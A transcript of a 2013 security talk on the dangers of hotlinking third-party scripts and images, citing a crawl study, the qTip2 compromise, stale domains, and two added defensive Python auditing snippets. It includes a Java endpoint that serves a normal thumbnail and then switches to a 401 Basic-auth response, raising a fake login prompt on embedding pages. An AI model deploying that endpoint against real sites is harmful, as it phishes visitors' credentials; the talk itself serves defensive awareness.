Hotlinking is Too Hot for Comfort

Presentation given at GeekMeet in Stockholm, January 2013. Covers the risks with hotlinking JavaScript and images in your websites.

    Presentation Transcript

    • Hotlinking is Too Hot for Comfort, @johnwilander, GeekMeet Stockholm 2013
    • Hotlinking == <img src="http://3rdparty.net"> <script src="http://3rdparty.net"></script>
    • The paper: "You Are What You Include" by Nikiforakis et al, http://seclab.cs.ucsb.edu/media/uploads/papers/jsinclusions.pdf
    • Crawled:
        • Alexa Top 10,000
        • Up to 500 pages per domain
        • 3,000,000+ pages in total
    • Sites typically hotlink JavaScript from 5-15 remote hosts
    • If I can run a script on your site or app, what can I do?
    • Browser Exploitation Framework, http://beefproject.com/
    • So, who is able to run scripts on your site?
    • Top hotlinked .js files across the Alexa Top 10,000:

      Service                            .js                                               % of Alexa Top 10,000
      Web analytics                      www.google-analytics.com/ga.js                    68.37%
      Dynamic Ads                        pagead2.googlesyndication.com/pagead/show_ads.js  23.87%
      Web analytics                      www.google-analytics.com/urchin.js                17.32%
      Social Networking                  connect.facebook.net/en_us/all.js                 16.82%
      Social Networking                  platform.twitter.com/widgets.js                   13.87%
      Social Networking & Web analytics  s7.addthis.com/js/250/addthis_widget.js           12.68%
      Web analytics & Tracking           edge.quantserve.com/quant.js                      11.98%
      Market Research                    b.scorecardresearch.com/beacon.js                 10.45%
      Google Helper Functions            www.google.com/jsapi                              10.14%
      Web analytics                      ssl.google-analytics.com/ga.js                    10.12%

      ga.js and urchin.js are two different versions of Google Analytics, so they are probably not on the same site: 68.37 + 17.32 ≈ 85% of the Alexa Top 10,000. Please don't be evil, Google.
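To answer that question for your own pages, an added example that is not from the talk or the paper: a small Python audit that parses a page's HTML, resolves every script and image src, and lists the third-party hosts that can run script or serve images on it. The sample page and its host names are constructed; cdn.stale-example.test is a placeholder.

```python
from collections import defaultdict
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class HotlinkCollector(HTMLParser):
    """Collect the src of every <script> and <img> tag."""
    def __init__(self):
        super().__init__()
        self.found = []  # (tag, src) pairs
    def handle_starttag(self, tag, attrs):
        if tag in ("script", "img"):
            src = dict(attrs).get("src")
            if src:
                self.found.append((tag, src))

def audit_hotlinks(html, page_url):
    """Return {"script": {host: [urls]}, "img": {host: [urls]}} for hosts other than the page's own."""
    own_host = urlsplit(page_url).hostname
    parser = HotlinkCollector()
    parser.feed(html)
    report = {"script": defaultdict(list), "img": defaultdict(list)}
    for tag, src in parser.found:
        absolute = urljoin(page_url, src)  # resolves relative and protocol-relative (//host/x) URLs
        parts = urlsplit(absolute)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            continue  # data: and javascript: URLs are not fetched from a remote host
        if parts.hostname == own_host:
            continue  # served from our own origin: not a hotlink
        report[tag][parts.hostname].append(absolute)
    return {tag: dict(hosts) for tag, hosts in report.items()}

# Constructed sample page; cdn.stale-example.test stands in for a stale hotlink host.
SAMPLE_HTML = """<html><head>
<script src="/js/app.js"></script>
<script src="https://www.google-analytics.com/ga.js"></script>
<script src="//platform.twitter.com/widgets.js"></script>
<script src="http://cdn.stale-example.test/jquery.qtip.min.js"></script>
</head><body>
<img src="img/thumb_john.jpg">
<img src="http://3rdparty.net/thumb_john.jpg">
<img src="data:image/gif;base64,R0lGODlhAQABAAAAACw=">
</body></html>"""

if __name__ == "__main__":
    report = audit_hotlinks(SAMPLE_HTML, "https://www.mysite.example/index.html")
    print("%d remote hosts can run script on this page" % len(report["script"]))
    for tag in ("script", "img"):
        for host, urls in sorted(report[tag].items()):
            print(tag, host, ", ".join(urls))
```

Run it against a crawl of your own site and compare the script host count with the 5-15 remote hosts the paper found typical; every host listed is one whose compromise or expiry becomes your problem.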
    • 2011-12-08 there was an issue reported: https://github.com/Craga89/qTip2/issues/286
    • "sends your browser agent and another piece of info"
    • "old Wordpress install … security vulnerability", "infected nearly all JS files on my site"
    • "The offending scripts have been removed as well as the Wordpress blog", "cronjob setup that checks for changes", "Closed"
    • Comment: "it downloads some other exploits"
    • One month later … https://github.com/Craga89/qTip2/issues/286
    • "issue is still present"
    • "Looks like the security hole wasn't plugged after all", "Please … do not hotlink", "Reopened"
    • "I've disabled the Wordpress blog on my site", "Closed"
    • Questions on the qTip hack:
        • How many end user PCs were trojanized?
        • How many passwords stolen?
        • How many credit card numbers stolen?
        • How many internet bank logins remote controlled?
    • Stale Hotlink Domains
    • Alexa Top 10,000 sites hotlink from domains elsewhere in the Alexa Top 1,000,000 and from other domains outside it; some of those other domains are stale, open for purchase
    • The Stale Numbers:
        • +3,000,000 pages crawled
        • 4,225 hotlinked domains outside Alexa Top 1,000,000
        • 50 domains stale, i.e. no longer registered
    • Nick et al purchased two of those stale domains
    • Stale domains hbotapadmin.com and blogtools.us were hotlinked by Alexa Top 10,000 sites (hbo.com and goldprice.org among them) plus 23 less popular sites:

                          blogtools.us  hbotapadmin.com
      Visits (15 days)    80,466        4,615
      Including domains   24            4
      Including pages     84            41
    • The Case of the Unauthorized Image
    • "Hotlinked images, can they bite me too?"
    • OK, this might be bad: <script src="http://3rdparty.net"></script> But this? <img src="http://3rdparty.net">
    • What if Meetup allowed profile images to be hotlinked?
    • Meanwhile, at the Attacker's Server …
    • Including images typically looks like this in a web app project:
        src/main/webapp/
          css/…
          img/thumb_john.jpg
          js/…
          html/…
      But an attacker could instead resolve that image URL in code, like this …
    • The attacker's JAX-RS image endpoint: the same URL serves the real thumbnail until the attacker flips returnUnauthorized, adding some nasty, alternate behavior:

```java
import java.awt.image.BufferedImage;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import javax.imageio.ImageIO;
import javax.servlet.ServletContext;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.core.Context;
import javax.ws.rs.core.Response;

// Fragment of a resource class on the attacker's server.
private static final String IMG_PATH = "/img/thumb_john.jpg";
private boolean returnUnauthorized = false;

@GET
@Path("/thumb_john.jpg")
@Produces("image/jpg")
public Response getEvilImage(@Context ServletContext context) {
    if (returnUnauthorized) {
        // The alternate behavior: a 401 with WWW-Authenticate makes the victim's
        // browser show a Basic auth login prompt on top of the page embedding the image.
        return Response.status(Response.Status.UNAUTHORIZED)
                .header("WWW-Authenticate", "Basic").build();
    } else {
        // Normal behavior: read and serve the real thumbnail.
        try {
            BufferedImage image = ImageIO.read(context.getResourceAsStream(IMG_PATH));
            ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
            ImageIO.write(image, "jpg", outputStream);
            byte[] imageData = outputStream.toByteArray();
            return Response.ok(imageData).build();
        } catch (IOException e) {
            e.printStackTrace();
            return Response.serverError().build();
        }
    }
}
```
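The defender-side counterpart, added here and not from the talk: instead of hotlinking a user-supplied image URL, the site fetches it once and re-hosts it from its own origin only if the response is a plain image. The function vets a captured (status, headers, body) triple; the sample responses are constructed.

```python
# Magic bytes of the image formats we are willing to re-host.
IMAGE_MAGIC = (
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
)
ACCEPTED_TYPES = {"image/jpeg", "image/jpg", "image/png", "image/gif"}

def sniff_image_type(body):
    """Return the MIME type implied by the body's magic bytes, or None."""
    for magic, mime in IMAGE_MAGIC:
        if body.startswith(magic):
            return mime
    return None

def vet_remote_image(status, headers, body):
    """Decide whether a fetched response may be stored and served as an image.
    headers: dict with lowercase header names. Returns (accepted, reason)."""
    if status != 200:
        return False, "status %d, not a plain image response" % status
    if "www-authenticate" in headers:
        # This header on a 401 is what makes the visitor's browser show a login prompt;
        # it is never forwarded, and a source sending it is refused even on a 200.
        return False, "WWW-Authenticate header present"
    declared = headers.get("content-type", "").split(";")[0].strip().lower()
    if declared not in ACCEPTED_TYPES:
        return False, "content-type %r is not an accepted image type" % declared
    sniffed = sniff_image_type(body)
    if sniffed is None:
        return False, "body does not start with JPEG/PNG/GIF magic bytes"
    # Heuristic only: a GIF/HTML/JS polyglot still starts with GIF magic. Decoding and
    # re-encoding the pixels (as the Java snippet does with ImageIO) is the robust fix.
    if b"<script" in body.lower() or b"<html" in body.lower():
        return False, "image body contains HTML/script markup (polyglot)"
    return True, sniffed

# Constructed sample responses, as an image proxy would capture them.
SAMPLES = {
    "real_jpeg": (200, {"content-type": "image/jpeg"}, b"\xff\xd8\xff\xe0" + b"\x00" * 16),
    "auth_prompt": (401, {"www-authenticate": "Basic"}, b""),
    "html_as_image": (200, {"content-type": "image/jpeg"}, b"<html><body>login</body></html>"),
    "gif_polyglot": (200, {"content-type": "image/gif"}, b"GIF89a" + b"\x00" * 4 + b"<script>x</script>"),
}

if __name__ == "__main__":
    for name, response in SAMPLES.items():
        print(name, vet_remote_image(*response))
```

Re-hosting also removes the attacker's ability to change the response later, which is the whole trick in the endpoint above.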
    • Now what will John Doe enter?
    • Some more nails for the coffin …
        • CSS files can execute JavaScript (expressions in IE6-7 and XBL in Firefox)
        • SVGs can execute JavaScript
        • Gif files can be edited to become executable JavaScript and HTML